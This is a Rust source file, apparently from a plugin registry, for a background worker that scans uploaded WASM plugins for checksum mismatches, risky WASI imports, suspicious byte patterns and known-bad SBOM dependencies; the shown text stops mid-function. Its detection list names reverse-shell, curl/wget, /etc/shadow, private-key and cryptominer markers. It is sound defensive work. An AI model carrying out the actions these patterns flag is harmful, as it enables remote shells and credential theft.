Skip to main content

mockforge_registry_server/workers/
plugin_scanner.rs

1//! Background worker that drains `plugin_security_scans` rows in the
2//! `"pending"` state, re-downloads the published WASM artifact, runs a set of
3//! integrity + static-analysis checks against it, and persists the result.
4//!
5//! The checks fall into three buckets:
6//!
7//! * **Storage integrity** — the artifact exists, downloads, and matches the
8//!   declared file size and SHA-256 checksum.
9//! * **Format validity** — bytes parse as a WebAssembly module via
10//!   `wasmparser`, with a parse-time budget to catch pathological inputs.
11//! * **Static analysis** — import/export inventory (unknown host namespaces,
12//!   high-risk WASI capabilities like `path_open` or `sock_*`), data-segment
13//!   byte-pattern scanning for hardcoded credentials, suspicious URLs, and
14//!   known-bad command strings, and section-size anomaly detection.
15//!
16//! **Isolation.** Every scan runs in `spawn_blocking` with a hard wall-clock
17//! timeout. A scan that panics or burns CPU past the budget fails the job
18//! (recorded as `"fail"` with a clear finding) but cannot take down the
19//! worker or the request-serving process. This is not a substitute for an
20//! out-of-process sandbox — the scanner still runs in the same address
21//! space as the server — but it bounds blast radius to a single thread and
22//! single scan.
23//!
24//! **What this explicitly does not do.** It does not execute the WASM
25//! module. It does not run dependency vulnerability checks against external
26//! advisory databases. It does not claim a passing verdict means the plugin
27//! is safe — only that no static red flag was raised. Dynamic sandbox
28//! execution in a subprocess is tracked separately.
29//!
30//! The worker is stateless: on every tick it re-queries for `status =
31//! 'pending'` rows, claims each by upserting a result, and moves on.
32//! Concurrent workers are safe because the upsert is idempotent — the last
33//! writer wins.
34
35use std::time::Duration;
36
37use serde_json::{json, Value as JsonValue};
38use sha2::{Digest, Sha256};
39use tracing::{debug, error, info, warn};
40use wasmparser::{Parser, Payload};
41
42use crate::storage::PluginStorage;
43use crate::AppState;
44
/// How often the worker wakes up to look for `"pending"` scan rows.
const WORKER_INTERVAL: Duration = Duration::from_secs(30);

/// Maximum number of pending rows claimed per tick, bounding per-tick work
/// so a backlog can't monopolize the worker indefinitely.
const JOBS_PER_TICK: i64 = 10;

/// Hard wall-clock limit for a single scan. A scan exceeding this is treated
/// as a failure — a well-formed plugin artifact should parse in milliseconds
/// even on a small instance; anything slower is either pathological input or
/// a scanner bug we want visibility into.
const SCAN_TIMEOUT: Duration = Duration::from_secs(15);

/// Hard cap on how much of the WASM body we'll byte-scan for patterns. WASM
/// artifacts larger than ~32 MiB are unusual for plugins, and data-segment
/// scanning is O(n * patterns); this prevents a huge legitimate artifact
/// from starving the worker.
const BYTE_SCAN_BUDGET: usize = 32 * 1024 * 1024;

/// Import namespaces the MockForge runtime is known to provide. Imports from
/// any other namespace are surfaced as an "unknown host binding" finding —
/// not necessarily malicious, but a signal the plugin expects a custom
/// embedding the registry can't guarantee.
const ALLOWED_IMPORT_NAMESPACES: &[&str] = &[
    "wasi_snapshot_preview1",
    "wasi_unstable",
    "env",
    "mockforge",
    "mockforge_host",
];

/// WASI capabilities a well-behaved MockForge plugin should never need. These
/// are coarse signals — a legitimate plugin might have a good reason to open
/// sockets — but in a mock-API-server plugin context they warrant review.
/// Each entry is `(import_name, severity, human_description)`.
const HIGH_RISK_WASI_IMPORTS: &[(&str, &str, &str)] = &[
    ("sock_open", "high", "opens outbound network sockets"),
    ("sock_connect", "high", "initiates outbound network connections"),
    ("sock_bind", "high", "binds to listening sockets"),
    ("sock_accept", "high", "accepts inbound connections"),
    ("path_open", "medium", "opens filesystem paths"),
    ("path_create_directory", "medium", "creates directories"),
    ("path_unlink_file", "medium", "deletes files"),
    ("path_remove_directory", "medium", "removes directories"),
    ("path_rename", "medium", "renames files"),
    ("proc_exec", "critical", "executes external processes"),
    ("proc_exit", "low", "exits the host process"),
];

/// Byte patterns that are almost certainly exfiltration or shell-injection
/// markers if they appear inline in a plugin's data segments. Each is
/// searched case-insensitively across the first `BYTE_SCAN_BUDGET` bytes of
/// the artifact. Tuned conservatively: hits on very short tokens would noise
/// up the report, so only high-signal strings land here.
/// Each entry is `(pattern_bytes, severity, human_description)`.
const SUSPICIOUS_BYTE_PATTERNS: &[(&[u8], &str, &str)] = &[
    (b"/bin/sh -c", "critical", "shell command invocation"),
    (b"/bin/bash -c", "critical", "shell command invocation"),
    (b"curl http", "high", "hardcoded outbound curl URL"),
    (b"wget http", "high", "hardcoded outbound wget URL"),
    (b"nc -e", "critical", "reverse shell marker (netcat -e)"),
    (b"/etc/passwd", "high", "attempts to read system credentials file"),
    (b"/etc/shadow", "critical", "attempts to read system shadow file"),
    (b"aws_access_key_id=", "critical", "hardcoded AWS access key"),
    (b"AKIA", "medium", "possible AWS access key id"),
    (b"-----BEGIN PRIVATE KEY-----", "critical", "embedded private key"),
    (b"-----BEGIN RSA PRIVATE KEY-----", "critical", "embedded RSA private key"),
    (b"-----BEGIN OPENSSH PRIVATE KEY-----", "critical", "embedded SSH private key"),
    (b"xmr.pool", "critical", "cryptominer pool URL"),
    (b"stratum+tcp", "critical", "cryptominer stratum URL"),
];
111
112pub fn start_plugin_scanner_worker(state: AppState) {
113    tokio::spawn(async move {
114        // Initial tick so a just-published plugin gets scanned within ~30s of
115        // publish, rather than waiting a full interval.
116        let mut interval = tokio::time::interval(WORKER_INTERVAL);
117        interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
118
119        loop {
120            interval.tick().await;
121            if let Err(e) = run_once(&state).await {
122                error!("plugin scanner tick failed: {}", e);
123            }
124        }
125    });
126
127    info!(
128        "Plugin security scanner worker started (interval = {}s)",
129        WORKER_INTERVAL.as_secs()
130    );
131}
132
/// One worker tick: claim up to `JOBS_PER_TICK` pending scan rows and drive
/// each to a terminal, persisted result.
///
/// For every job: run the scan, fold in SBOM-derived findings (only after
/// the SBOM is verified checksum-bound to this exact artifact) plus any
/// publisher attestation, then upsert the row. A scan that errors is
/// persisted as `"fail"` with an explanatory finding rather than being left
/// `pending`; persistence errors themselves are only logged, so one bad row
/// can't wedge the rest of the tick.
async fn run_once(state: &AppState) -> anyhow::Result<()> {
    let jobs = state.store.list_pending_security_scans(JOBS_PER_TICK).await?;
    if jobs.is_empty() {
        debug!("plugin scanner: no pending jobs");
        return Ok(());
    }

    info!("plugin scanner: processing {} pending job(s)", jobs.len());

    for job in jobs {
        let plugin_version_id = job.plugin_version_id;
        let declared_checksum = job.checksum.clone();
        match scan_one(&state.storage, &job).await {
            Ok(mut result) => {
                // Cross-reference any SBOM the publisher submitted against
                // the vulnerability list before we persist the result, so
                // findings from both static + dependency analysis land in
                // one row. Before trusting package names, verify the SBOM
                // is bound to *this* artifact by checksum — otherwise a
                // publisher could submit a clean SBOM for a dirty WASM.
                //
                // NOTE(review): a store error here is silently treated the
                // same as "no SBOM" — confirm that's intended.
                if let Ok(Some(sbom)) = state.store.get_plugin_version_sbom(plugin_version_id).await
                {
                    let trust = verify_sbom_binding(&sbom, &declared_checksum);
                    record_sbom_binding(&mut result, &trust);

                    // Surface publisher attestation when one is recorded.
                    // This is strictly additive — a missing attestation
                    // doesn't downgrade the score; a *present* one just
                    // earns a positive finding, which the UI can display
                    // distinctly from the generic "SBOM bound" case.
                    if let Ok(Some((key_id, signed_at))) =
                        state.store.get_plugin_version_attestation(plugin_version_id).await
                    {
                        append_finding(
                            &mut result,
                            json!({
                                "severity": "info",
                                "category": "supply_chain",
                                "title": "Verified publisher attestation",
                                "description": format!(
                                    "SBOM was signed by a public key ({}) registered to the publishing account on {}. The account vouches for the dependency list.",
                                    key_id,
                                    signed_at.to_rfc3339()
                                )
                            }),
                        );
                    }

                    // Dependency findings are applied only for a
                    // checksum-bound SBOM; an unbound one earned its own
                    // finding in `record_sbom_binding` above.
                    if matches!(trust, SbomBinding::Bound) {
                        apply_sbom_findings_async(&*state.store, &mut result, &sbom).await;
                    }
                }
                if let Err(e) = state
                    .store
                    .upsert_plugin_security_scan(
                        plugin_version_id,
                        &result.status,
                        result.score,
                        &result.findings,
                        Some(env!("CARGO_PKG_VERSION")),
                    )
                    .await
                {
                    error!(
                        plugin = %job.plugin_name,
                        version = %job.version,
                        "failed to persist scan result: {}",
                        e
                    );
                }
            }
            Err(e) => {
                // We surface the scan infrastructure failure as a "fail"
                // result rather than leaving the row pending forever.
                // Operators get a signal from the finding body; users see a
                // clear "could not scan" status instead of silence.
                warn!(
                    plugin = %job.plugin_name,
                    version = %job.version,
                    "scan failed: {}",
                    e
                );
                let findings = json!([
                    {
                        "severity": "high",
                        "category": "other",
                        "title": "Security scan could not complete",
                        "description": format!(
                            "The registry was unable to finish scanning this artifact: {}. An operator will need to retry.",
                            e
                        )
                    }
                ]);
                if let Err(persist_err) = state
                    .store
                    .upsert_plugin_security_scan(
                        plugin_version_id,
                        "fail",
                        0,
                        &findings,
                        Some(env!("CARGO_PKG_VERSION")),
                    )
                    .await
                {
                    error!(
                        plugin = %job.plugin_name,
                        version = %job.version,
                        "failed to persist scan error: {}",
                        persist_err
                    );
                }
            }
        }
    }

    Ok(())
}
250
/// Result of scanning a single artifact, in the shape persisted by
/// `upsert_plugin_security_scan`.
struct ScanOutcome {
    // Terminal status string; the in-process analyzer emits "pass",
    // "warning", or "fail" (subprocess reports are forwarded verbatim).
    status: String,
    // Penalty-adjusted score; the in-process analyzer clamps it to 0..=100.
    score: i16,
    // JSON array of finding objects (severity/category/title/description).
    findings: JsonValue,
}
256
257async fn scan_one(
258    storage: &PluginStorage,
259    job: &mockforge_registry_core::models::PendingScanJob,
260) -> anyhow::Result<ScanOutcome> {
261    let key = PluginStorage::plugin_object_key(&job.plugin_name, &job.version)?;
262    let bytes = storage.download_plugin(&key).await?;
263    let declared_size = job.file_size;
264    let declared_checksum = job.checksum.clone();
265
266    // Prefer the dedicated `mockforge-plugin-scanner` subprocess when it's on
267    // PATH — it carries the wasmtime engine into its own process so any
268    // wasmtime-level compile/link misbehavior crashes the subprocess rather
269    // than the server. Fall back to in-process static analysis when the
270    // binary isn't installed (dev environments, tests, containers that omit
271    // the scanner-bin feature).
272    if let Some(path) = scanner_binary_path() {
273        match run_subprocess_scan(&path, &bytes, declared_size, &declared_checksum).await {
274            Ok(outcome) => return Ok(outcome),
275            Err(e) => {
276                // Subprocess failure is surfaced as a warning and we fall
277                // back to the in-process scanner; losing coverage on
278                // dynamic instantiation is still better than leaving the
279                // row pending indefinitely.
280                warn!(
281                    plugin = %job.plugin_name,
282                    version = %job.version,
283                    "subprocess scanner failed ({}) — falling back to in-process analysis",
284                    e
285                );
286            }
287        }
288    }
289
290    // The static analysis walk is CPU-bound and can panic on
291    // malicious/pathological inputs (wasmparser fuzzers have found real
292    // panics in the past). Running it on a blocking pool gives us:
293    //   1. tokio::time::timeout enforcement — a runaway scan can't starve
294    //      the worker's async runtime thread.
295    //   2. panic isolation — `spawn_blocking` turns a panic into a
296    //      `JoinError`, which we report as a scan failure instead of
297    //      crashing the process.
298    let scan_fut = tokio::task::spawn_blocking(move || {
299        analyze_bytes(&bytes, declared_size, declared_checksum.as_str())
300    });
301
302    let join_result = match tokio::time::timeout(SCAN_TIMEOUT, scan_fut).await {
303        Ok(res) => res,
304        Err(_) => {
305            return Ok(ScanOutcome {
306                status: "fail".to_string(),
307                score: 0,
308                findings: JsonValue::Array(vec![json!({
309                    "severity": "high",
310                    "category": "other",
311                    "title": "Scan timed out",
312                    "description": format!(
313                        "Static analysis exceeded the {}s budget. This usually means a pathological WASM input; the artifact is rejected until a manual review runs.",
314                        SCAN_TIMEOUT.as_secs()
315                    )
316                })]),
317            });
318        }
319    };
320
321    match join_result {
322        Ok(outcome) => Ok(outcome),
323        Err(join_err) => {
324            // Panic inside the scanner — surface it as a failure rather
325            // than bubbling the panic up into the worker loop.
326            Ok(ScanOutcome {
327                status: "fail".to_string(),
328                score: 0,
329                findings: JsonValue::Array(vec![json!({
330                    "severity": "critical",
331                    "category": "other",
332                    "title": "Scanner panicked",
333                    "description": format!(
334                        "The static scanner panicked while processing this artifact: {}. This is a scanner bug — the plugin has been marked failed pending investigation.",
335                        join_err
336                    )
337                })]),
338            })
339        }
340    }
341}
342
/// Resolve the scanner binary. `MOCKFORGE_PLUGIN_SCANNER_BIN` overrides the
/// default ("mockforge-plugin-scanner" on PATH) so deployers can point at an
/// absolute path or a harness-specific build. A set-but-blank override falls
/// back to the default.
fn scanner_binary_path() -> Option<String> {
    match std::env::var("MOCKFORGE_PLUGIN_SCANNER_BIN") {
        Ok(path) if !path.trim().is_empty() => Some(path),
        // We don't verify PATH here — Command will fail with NotFound if the
        // binary is missing, which the caller treats as a soft error.
        _ => Some("mockforge-plugin-scanner".to_string()),
    }
}
356
/// Run the out-of-process scanner binary against `bytes` and parse its JSON
/// report from stdout into a [`ScanOutcome`].
///
/// The artifact is written to a tempfile (the CLI contract is `--wasm-path`,
/// not stdin), the subprocess runs under the same `SCAN_TIMEOUT` wall-clock
/// budget as in-process scans, and any failure — spawn error, timeout,
/// non-zero exit, unparseable stdout — is returned as `Err` so the caller
/// can fall back to the in-process analyzer.
async fn run_subprocess_scan(
    scanner_path: &str,
    bytes: &[u8],
    declared_size: i64,
    declared_checksum: &str,
) -> anyhow::Result<ScanOutcome> {
    // Drop bytes into a tempfile because the scanner takes `--wasm-path`.
    // Using a tempfile (rather than piping on stdin) lets the scanner
    // mmap/seek arbitrarily and keeps the CLI contract simple. File IO is
    // blocking, so we stay on `spawn_blocking` for both the create and the
    // write — it comes back as a path we own.
    let bytes_owned = bytes.to_vec();
    let tmp_path = tokio::task::spawn_blocking(move || -> std::io::Result<_> {
        use std::io::Write;
        let mut tmp = tempfile::NamedTempFile::new()?;
        tmp.write_all(&bytes_owned)?;
        tmp.flush()?;
        // Keep the handle alive so the path stays valid until we drop it.
        // `into_temp_path` releases the file handle but keeps the
        // delete-on-drop guard, so the path survives crossing the await.
        Ok(tmp.into_temp_path())
    })
    .await??;

    let mut cmd = tokio::process::Command::new(scanner_path);
    // `kill_on_drop(true)` means a timed-out child is killed when the
    // `output()` future below is dropped, rather than leaking a runaway
    // scanner process.
    cmd.arg("--wasm-path")
        .arg::<&std::path::Path>(tmp_path.as_ref())
        .arg("--checksum")
        .arg(declared_checksum)
        .arg("--declared-size")
        .arg(declared_size.to_string())
        .kill_on_drop(true)
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped());

    let output_fut = cmd.output();
    let output = match tokio::time::timeout(SCAN_TIMEOUT, output_fut).await {
        Ok(res) => res?,
        Err(_) => {
            anyhow::bail!(
                "subprocess scanner exceeded {}s wall-clock budget",
                SCAN_TIMEOUT.as_secs()
            );
        }
    };

    // Tempfile is cleaned up on drop, but we've already read the output so
    // we're done with it. Explicit drop makes the lifetime visible.
    drop(tmp_path);

    if !output.status.success() {
        anyhow::bail!(
            "subprocess scanner exited with {}: {}",
            output.status,
            String::from_utf8_lossy(&output.stderr).trim()
        );
    }

    let report: SubprocessReport = serde_json::from_slice(&output.stdout).map_err(|e| {
        anyhow::anyhow!(
            "subprocess scanner returned invalid JSON: {} (stdout was: {:?})",
            e,
            String::from_utf8_lossy(&output.stdout)
        )
    })?;

    // The subprocess produces `snake_case` severity/category strings via the
    // serde derives in `scanner.rs`. We forward the payload as a JSON Value
    // array so downstream UI/storage code doesn't have to care where the
    // scan ran.
    let findings = serde_json::to_value(&report.findings)?;

    Ok(ScanOutcome {
        status: report.status,
        score: report.score,
        findings,
    })
}
433
/// JSON report emitted on stdout by the `mockforge-plugin-scanner`
/// subprocess. Field names must stay in sync with the scanner's serde
/// serialization.
#[derive(Debug, serde::Deserialize)]
struct SubprocessReport {
    // Terminal scan status, forwarded verbatim into `ScanOutcome`.
    status: String,
    // Scanner-computed score, forwarded verbatim.
    score: i16,
    // Individual findings, re-serialized into the persisted JSON array.
    findings: Vec<SubprocessFinding>,
    // Parsed so the schema stays complete, but not consumed here yet
    // (presumably whether the module instantiated under wasmtime — confirm
    // against the scanner binary's docs).
    #[allow(dead_code)]
    dynamic_instantiable: bool,
    // Scanner-side wall time; parsed but unused here.
    #[allow(dead_code)]
    duration_ms: u128,
}
444
/// One finding from the subprocess report. `Serialize` is derived as well
/// because the findings are re-serialized into the persisted JSON array.
#[derive(Debug, serde::Deserialize, serde::Serialize)]
struct SubprocessFinding {
    severity: String,
    category: String,
    title: String,
    description: String,
}
452
453fn analyze_bytes(bytes: &[u8], declared_size: i64, declared_checksum: &str) -> ScanOutcome {
454    let mut findings: Vec<JsonValue> = Vec::new();
455    let mut score: i16 = 100;
456
457    // --- Storage integrity ---------------------------------------------
458
459    let actual_size = bytes.len() as i64;
460    if actual_size != declared_size {
461        findings.push(json!({
462            "severity": "high",
463            "category": "other",
464            "title": "Artifact size mismatch",
465            "description": format!(
466                "Stored artifact is {} bytes but the publish request declared {}.",
467                actual_size, declared_size
468            )
469        }));
470        score -= 40;
471    }
472
473    let computed = {
474        let mut hasher = Sha256::new();
475        hasher.update(bytes);
476        hex_encode(&hasher.finalize())
477    };
478    if !computed.eq_ignore_ascii_case(declared_checksum) {
479        findings.push(json!({
480            "severity": "critical",
481            "category": "supply_chain",
482            "title": "Checksum mismatch",
483            "description": format!(
484                "SHA-256 of stored artifact ({}) does not match the checksum recorded at publish time ({}).",
485                computed, declared_checksum
486            )
487        }));
488        score = score.saturating_sub(60);
489    }
490
491    // --- Magic bytes + version ----------------------------------------
492
493    if bytes.len() < 8 || &bytes[0..4] != b"\0asm" {
494        findings.push(json!({
495            "severity": "critical",
496            "category": "other",
497            "title": "Not a valid WebAssembly module",
498            "description": "Artifact does not begin with the WASM magic bytes (\\0asm). It cannot be loaded by any MockForge runtime.",
499        }));
500        return ScanOutcome {
501            status: "fail".to_string(),
502            score: 0,
503            findings: JsonValue::Array(findings),
504        };
505    }
506
507    // WASM binary spec version is u32 LE immediately after magic. Spec
508    // currently only defines version 1; anything else is either an
509    // unfinished proposal or garbage.
510    let version = u32::from_le_bytes([bytes[4], bytes[5], bytes[6], bytes[7]]);
511    if version != 1 {
512        findings.push(json!({
513            "severity": "medium",
514            "category": "other",
515            "title": "Unexpected WASM binary version",
516            "description": format!(
517                "Module declares WASM binary version {} — the only currently-stable value is 1. This may indicate an experimental toolchain.",
518                version
519            )
520        }));
521        score = score.saturating_sub(10);
522    }
523
524    // --- Structured static analysis (parses sections) ------------------
525
526    let mut import_count = 0u32;
527    let mut unknown_namespaces = std::collections::BTreeSet::new();
528    let mut high_risk_imports: Vec<(String, &'static str, &'static str)> = Vec::new();
529    let mut export_count = 0u32;
530    let mut has_plugin_entrypoint = false;
531    let mut data_segment_bytes: usize = 0;
532    let mut parse_error: Option<String> = None;
533
534    let parser = Parser::new(0);
535    for payload in parser.parse_all(bytes) {
536        match payload {
537            Ok(Payload::ImportSection(reader)) => {
538                for import in reader {
539                    match import {
540                        Ok(imp) => {
541                            import_count += 1;
542                            let ns = imp.module;
543                            if !ALLOWED_IMPORT_NAMESPACES.contains(&ns) {
544                                unknown_namespaces.insert(ns.to_string());
545                            }
546                            if ns.starts_with("wasi") {
547                                if let Some(entry) =
548                                    HIGH_RISK_WASI_IMPORTS.iter().find(|(n, _, _)| *n == imp.name)
549                                {
550                                    high_risk_imports.push((
551                                        format!("{}::{}", ns, imp.name),
552                                        entry.1,
553                                        entry.2,
554                                    ));
555                                }
556                            }
557                        }
558                        Err(e) => {
559                            parse_error = Some(format!("malformed import: {}", e));
560                            break;
561                        }
562                    }
563                }
564            }
565            Ok(Payload::ExportSection(reader)) => {
566                for export in reader {
567                    match export {
568                        Ok(exp) => {
569                            export_count += 1;
570                            // MockForge plugins conventionally export at
571                            // least one function starting with
572                            // `_mockforge_` or `mockforge_plugin_`. Absence
573                            // isn't fatal (some toolchains mangle names)
574                            // but presence is a positive signal.
575                            if exp.name.starts_with("_mockforge_")
576                                || exp.name.starts_with("mockforge_plugin_")
577                                || exp.name == "_start"
578                            {
579                                has_plugin_entrypoint = true;
580                            }
581                        }
582                        Err(e) => {
583                            parse_error = Some(format!("malformed export: {}", e));
584                            break;
585                        }
586                    }
587                }
588            }
589            Ok(Payload::DataSection(reader)) => {
590                for segment in reader {
591                    match segment {
592                        Ok(seg) => {
593                            data_segment_bytes = data_segment_bytes.saturating_add(seg.data.len());
594                        }
595                        Err(e) => {
596                            parse_error = Some(format!("malformed data segment: {}", e));
597                            break;
598                        }
599                    }
600                }
601            }
602            Ok(_) => {}
603            Err(e) => {
604                parse_error = Some(e.to_string());
605                break;
606            }
607        }
608    }
609
610    if let Some(err) = parse_error {
611        findings.push(json!({
612            "severity": "high",
613            "category": "other",
614            "title": "WASM module failed to parse",
615            "description": format!("wasmparser rejected the module: {}", err),
616        }));
617        score = score.saturating_sub(40);
618    }
619
620    // Unknown host namespaces — one finding per namespace so the UI shows
621    // the specific import that won't resolve.
622    if !unknown_namespaces.is_empty() {
623        score = score.saturating_sub(15);
624        for ns in &unknown_namespaces {
625            findings.push(json!({
626                "severity": "medium",
627                "category": "supply_chain",
628                "title": "Unknown host import namespace",
629                "description": format!(
630                    "Plugin imports from '{}', which is not provided by any MockForge runtime binding.",
631                    ns
632                )
633            }));
634        }
635    }
636
637    // High-risk WASI capabilities. Severity is driven by the table above so
638    // e.g. `proc_exec` becomes critical, `path_open` stays medium.
639    for (full_name, severity, human) in &high_risk_imports {
640        let penalty: i16 = match *severity {
641            "critical" => 40,
642            "high" => 20,
643            "medium" => 8,
644            _ => 3,
645        };
646        score = score.saturating_sub(penalty);
647        findings.push(json!({
648            "severity": severity,
649            "category": "insecure_coding",
650            "title": format!("High-risk WASI import: {}", full_name),
651            "description": format!(
652                "This plugin imports a capability that {}. MockForge plugins usually do not need this — review carefully before using.",
653                human
654            )
655        }));
656    }
657
658    // Missing plugin entrypoint is informational, not a deduction. We only
659    // flag it if we saw at least one export; a module with zero exports is
660    // already a separate concern.
661    if export_count > 0 && !has_plugin_entrypoint {
662        findings.push(json!({
663            "severity": "info",
664            "category": "other",
665            "title": "No MockForge plugin entrypoint found",
666            "description": "No exported function matched '_mockforge_*', 'mockforge_plugin_*', or '_start'. This may just be a naming convention mismatch, but the plugin runtime may fail to load it."
667        }));
668    }
669
670    // Inventory finding so the UI shows what the module looks like at a
671    // glance even when everything is clean.
672    findings.push(json!({
673        "severity": "info",
674        "category": "other",
675        "title": "Module inventory",
676        "description": format!(
677            "{} import(s), {} export(s), {} byte(s) in data segments.",
678            import_count, export_count, data_segment_bytes
679        )
680    }));
681
682    // --- Byte-pattern scan across the whole artifact -------------------
683
684    let scan_slice = if bytes.len() > BYTE_SCAN_BUDGET {
685        &bytes[..BYTE_SCAN_BUDGET]
686    } else {
687        bytes
688    };
689    let lowered = scan_slice.to_ascii_lowercase();
690    for (pattern, severity, description) in SUSPICIOUS_BYTE_PATTERNS {
691        let needle = pattern.to_ascii_lowercase();
692        if contains_subslice(&lowered, &needle) {
693            let penalty: i16 = match *severity {
694                "critical" => 50,
695                "high" => 25,
696                "medium" => 10,
697                _ => 5,
698            };
699            score = score.saturating_sub(penalty);
700            findings.push(json!({
701                "severity": severity,
702                "category": "malware",
703                "title": format!("Suspicious byte pattern: {}", description),
704                "description": format!(
705                    "Artifact contains the byte pattern '{}'. This is a strong signal of {}.",
706                    String::from_utf8_lossy(pattern),
707                    description
708                )
709            }));
710        }
711    }
712
713    if bytes.len() > BYTE_SCAN_BUDGET {
714        findings.push(json!({
715            "severity": "info",
716            "category": "other",
717            "title": "Artifact exceeds byte-scan budget",
718            "description": format!(
719                "Only the first {} bytes were scanned for byte patterns. Artifacts larger than this cap should be reviewed manually.",
720                BYTE_SCAN_BUDGET
721            )
722        }));
723    }
724
725    // --- Verdict -------------------------------------------------------
726
727    let clamped = score.clamp(0, 100);
728    let status = if clamped >= 70 {
729        "pass"
730    } else if clamped >= 40 {
731        "warning"
732    } else {
733        "fail"
734    };
735
736    ScanOutcome {
737        status: status.to_string(),
738        score: clamped,
739        findings: JsonValue::Array(findings),
740    }
741}
742
/// Substring search over raw bytes: true iff `needle` occurs contiguously
/// inside `haystack`. An empty needle is deliberately defined as "not
/// found" — the byte scan never asks for it, and `windows(0)` would panic.
/// Split out so the tests can exercise it directly.
fn contains_subslice(haystack: &[u8], needle: &[u8]) -> bool {
    let n = needle.len();
    if n == 0 || n > haystack.len() {
        return false;
    }
    // Check every candidate start position for an exact slice match.
    (0..=haystack.len() - n).any(|start| haystack[start..start + n] == *needle)
}
752
/// A tiny hardcoded vulnerability feed. Each entry covers one known-bad
/// package (`ecosystem`, `name`, `version` OR version prefix), mirrored with
/// a severity and human description. Real deployments should replace this
/// with a live feed (OSV, GHSA, Snyk) — the function is structured to make
/// that swap easy: swap the constant for a lookup, keep the rest.
///
/// Keeping a short hardcoded list in-tree still delivers visible value:
/// known-bad fixtures like `event-stream@3.3.6` (the 2018 npm compromise)
/// or `colors@1.4.1` (the 2022 sabotage) surface immediately, and tests
/// can pin behavior without a network call.
///
/// Matching semantics (see `apply_sbom_findings`): the `version_prefix`
/// field is compared with `starts_with`, and an EMPTY prefix matches every
/// version of the package.
const KNOWN_VULNERABLE_PACKAGES: &[(&str, &str, &str, &str, &str)] = &[
    // (ecosystem, name, version_prefix, severity, description)
    (
        "npm",
        "event-stream",
        "3.3.6",
        "critical",
        "event-stream@3.3.6 shipped a malicious payload (flatmap-stream) targeting a specific bitcoin wallet library (2018).",
    ),
    (
        "npm",
        "flatmap-stream",
        "0.1.1",
        "critical",
        "flatmap-stream@0.1.1 was the vehicle for the event-stream supply-chain compromise.",
    ),
    (
        "npm",
        "colors",
        "1.4.1",
        "high",
        "colors@1.4.1 was intentionally sabotaged by the maintainer to emit garbage output (2022).",
    ),
    (
        "npm",
        "faker",
        "6.6.6",
        "high",
        "faker@6.6.6 was intentionally broken by the maintainer (2022).",
    ),
    (
        "npm",
        "ua-parser-js",
        "0.7.29",
        "high",
        "ua-parser-js@0.7.29 had a credential-stealer injected during a brief maintainer compromise.",
    ),
    (
        // Empty prefix: every version of this typosquat is malicious.
        "cargo",
        "rustdecimal",
        "",
        "critical",
        "rustdecimal (all versions) was a typosquat of rust_decimal hosting a malicious payload.",
    ),
    (
        "cargo",
        "openssl-src",
        "111.0.",
        "high",
        "openssl-src 111.0.x bundles very old OpenSSL with several CVEs. Upgrade to 300.x or later.",
    ),
    (
        // Empty prefix: the package itself was hijacked, so no version is safe.
        "pypi",
        "ctx",
        "",
        "critical",
        "ctx on PyPI was hijacked in 2022 and replaced with a credential exfiltrator; any version pins are suspect.",
    ),
];
822
/// Is the SBOM the publisher submitted actually about the artifact we just
/// scanned? CycloneDX 1.4+ lets a document declare its primary component
/// under `metadata.component.hashes` (array of `{ alg, content }`); we
/// check there first, then fall back to any top-level `components[i]` whose
/// `purl` or `name` matches the plugin name.
///
/// Outcomes:
///   * [`SbomBinding::Bound`] — a `SHA-256` hash in the SBOM matches the
///     artifact's declared checksum. Findings from this SBOM are trusted.
///   * [`SbomBinding::Unsigned`] — no digest was declared. We surface an
///     info-level finding and *skip* vulnerability scanning — better to
///     say nothing than to accept unverified claims.
///   * [`SbomBinding::Mismatch { declared }`] — the SBOM claims a
///     different artifact than the one we're looking at. Critical finding,
///     vuln scan skipped.
#[derive(Debug)]
enum SbomBinding {
    /// SBOM declared at least one SHA-256 digest matching the artifact.
    Bound,
    /// SBOM declared no SHA-256 digest anywhere in the document.
    Unsigned,
    /// SBOM declared digest(s) but none matched; `declared` carries the
    /// first digest found, for inclusion in the finding text.
    Mismatch { declared: String },
}
844
845fn verify_sbom_binding(sbom: &JsonValue, expected_checksum: &str) -> SbomBinding {
846    let expected = expected_checksum.to_ascii_lowercase();
847
848    // Collect every SHA-256 digest visible in the document, anywhere a
849    // CycloneDX-style `hashes` array might appear.
850    let mut declared: Vec<String> = Vec::new();
851    collect_sha256_hashes(sbom, &mut declared);
852
853    if declared.is_empty() {
854        return SbomBinding::Unsigned;
855    }
856
857    for d in &declared {
858        if d.eq_ignore_ascii_case(&expected) {
859            return SbomBinding::Bound;
860        }
861    }
862
863    // Declared at least one digest but none matched — actively lying, not
864    // just missing.
865    SbomBinding::Mismatch {
866        declared: declared.into_iter().next().unwrap_or_default(),
867    }
868}
869
870/// Walk the SBOM JSON looking for `hashes` arrays shaped like
871/// `[{ "alg": "SHA-256", "content": "..." }]`. Lowercase the contents so
872/// the caller compares case-insensitively.
873fn collect_sha256_hashes(node: &JsonValue, out: &mut Vec<String>) {
874    match node {
875        JsonValue::Object(map) => {
876            if let Some(JsonValue::Array(hashes)) = map.get("hashes") {
877                for h in hashes {
878                    let alg =
879                        h.get("alg").and_then(|v| v.as_str()).unwrap_or("").to_ascii_lowercase();
880                    let content = h.get("content").and_then(|v| v.as_str()).unwrap_or("");
881                    if (alg == "sha-256" || alg == "sha256") && !content.is_empty() {
882                        out.push(content.to_ascii_lowercase());
883                    }
884                }
885            }
886            for v in map.values() {
887                collect_sha256_hashes(v, out);
888            }
889        }
890        JsonValue::Array(arr) => {
891            for v in arr {
892                collect_sha256_hashes(v, out);
893            }
894        }
895        _ => {}
896    }
897}
898
899fn record_sbom_binding(outcome: &mut ScanOutcome, binding: &SbomBinding) {
900    match binding {
901        SbomBinding::Bound => {
902            append_finding(
903                outcome,
904                json!({
905                    "severity": "info",
906                    "category": "supply_chain",
907                    "title": "SBOM bound to artifact",
908                    "description": "SBOM contains a SHA-256 digest matching the published WASM. Dependency findings below are derived from this verified SBOM."
909                }),
910            );
911        }
912        SbomBinding::Unsigned => {
913            append_finding(
914                outcome,
915                json!({
916                    "severity": "medium",
917                    "category": "supply_chain",
918                    "title": "SBOM not bound to artifact",
919                    "description": "SBOM did not declare a SHA-256 hash for the artifact. Without a hash there's no way to prove this SBOM describes the WASM being published — dependency scanning was skipped. Add a `hashes: [{alg: \"SHA-256\", content: \"...\"}]` entry to metadata.component or the matching components[] row."
920                }),
921            );
922            // Unbound SBOM is a supply-chain weakness, but not fatal.
